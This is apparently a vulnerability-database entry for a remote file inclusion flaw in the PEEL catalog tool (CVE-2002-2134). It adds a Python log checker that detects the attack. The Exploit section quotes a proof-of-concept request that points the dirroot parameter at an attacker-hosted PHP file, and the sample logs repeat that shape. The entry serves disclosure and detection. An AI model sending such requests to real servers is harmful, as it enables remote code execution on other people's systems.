PEEL Remote File Inclusion Vulnerability

Vulnerability ID: 1107144
Vulnerability type: Input validation
Published: 2002-12-31
Updated: 2006-01-25
CVE ID: CVE-2002-2134
CNNVD-ID: CNNVD-200212-258
Platform: PHP
CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/22114
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-258
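|Vulnerability details
PEEL is a catalog management tool written in PHP. The haut.php script does not properly check user-supplied parameters, so a remote attacker can exploit this vulnerability to specify an arbitrary file on a remote server as the include file and have the code in it executed with the privileges of the web server. modeles/haut.php does not correctly handle the contents of the $dirroot parameter: a remote attacker can place an arbitrary PHP file on a server under their control and submit a request whose parameter data points to that remote file, which causes the code in the included file to be executed on the system with the privileges of the web server.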
|Exploit
source: http://www.securityfocus.com/bid/6496/info

PEEL is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers.

An attacker may exploit this by supplying a path to a maliciously created file, located on an attacker-controlled host as a value for some parameters.

If the remote file is a PHP script, this may allow for execution of attacker-supplied PHP code with the privileges of the webserver. Successful exploitation may provide local access to the attacker. 

http://[target]/modeles/haut.php?dirroot=http://[attacker]&SESSION=.
with:
http://[attacker]/lang/lang.php
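
Added example (not part of the original advisory or of the PEEL code base): a log check for the request shape shown above, flagging requests to modeles/haut.php whose dirroot value begins with a URL scheme. It assumes combined-format access logs; the function names, sample lines, addresses and host names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value that starts with a URL scheme (http://, ftp://, php://, data:, ...).
# Two or more characters, so Windows drive letters ("C:") do not match.
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.\-]+:', re.IGNORECASE)
SCRIPT = "/modeles/haut.php"   # script named in the advisory
PARAM = "dirroot"              # parameter named in the advisory


def fully_unquote(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def remote_include_attempt(log_line):
    """Return the suspicious dirroot value, or None if the line is clean."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    path = re.sub(r'/+', '/', fully_unquote(target.path)).lower()
    if not path.endswith(SCRIPT):
        return None
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        value = fully_unquote(value).strip()
        if name.lower() == PARAM and SCHEME_RE.match(value):
            return value
    return None


# Constructed sample log lines (documentation addresses and host names).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2003:10:00:00 +0000] "GET /modeles/haut.php?dirroot=http://files.example.net&SESSION=. HTTP/1.0" 200 512',
    '192.0.2.11 - - [01/Jan/2003:10:00:05 +0000] "GET /modeles/haut.php?dirroot=%68ttp%3A%2F%2Ffiles.example.net HTTP/1.0" 200 512',
    '192.0.2.12 - - [01/Jan/2003:10:00:09 +0000] "GET /modeles/haut.php?dirroot=/var/www/peel HTTP/1.0" 200 2048',
    '192.0.2.13 - - [01/Jan/2003:10:00:12 +0000] "GET /index.php?page=http://www.example.org HTTP/1.0" 200 4096',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(remote_include_attempt(line), "<-", line.split('"')[1])
```

Access logs record only the request line, so this check sees dirroot only when it is passed in the query string, as in the request above.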
|References

Source: BUGTRAQ
Name: 20021231PEEL(PHP)
Link: http://www.securityfocus.com/archive/1/304779
Source: BID
Name: 6496
Link: http://www.securityfocus.com/bid/6496
Source: XF
Name: peel-haut-file-include(10960)
Link: http://www.iss.net/security_center/static/10960.php
Source: SECTRACK
Name: 1005869
Link: http://www.securitytracker.com/id?1005869
Source: SECUNIA
Name: 7797
Link: http://secunia.com/advisories/7797
Source: NSFOCUS
Name: 4138
Link: http://www.nsfocus.net/vulndb/4138